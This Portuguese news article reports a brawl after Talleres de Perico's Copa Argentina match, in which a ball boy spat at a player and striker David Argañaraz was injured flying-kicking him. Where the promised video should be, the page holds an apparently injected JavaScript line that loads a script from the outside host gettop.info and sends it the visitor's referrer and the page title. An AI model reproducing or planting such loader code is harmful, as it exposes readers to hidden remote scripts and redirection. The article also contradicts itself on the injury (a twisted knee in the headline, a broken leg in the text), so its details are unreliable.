Centroavante torce o joelho ao dar voadora no gandula

A eliminação do Talleres de Perico da Copa da Argentina não poderia ter terminado de forma mais trágica. A vitória fora de casa por 1 a 0 no tempo normal contra o Central Norte não foi suficiente para classificar o time, que ainda teve um centroavante lesionado. A confusão começou após o apito final, quando jogadores do time visitante tiveram que se direcionar a um túnel de proteção para ir ao vestiário.

A torcida rival pressionava os atletas. A revolta dos torcedores, no entanto, se transformou em uma cusparada do gândula no rosto do camisa 2, Franco Sosa, o que desencadeou toda briga.

Em seguida, jogadores do Talleres correram atrás do gândula. O atacante David Argañaraz, ao acertar uma voadora nas costas do agressor, acabou quebrando a perna e caindo no chão. Argañaraz ainda levou dois pontapés e dois socos até a chegada de um fotógrafo, que colocou fim a baderna no estágio Luis Güemes, em Salta.

Confira o vídeo:

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário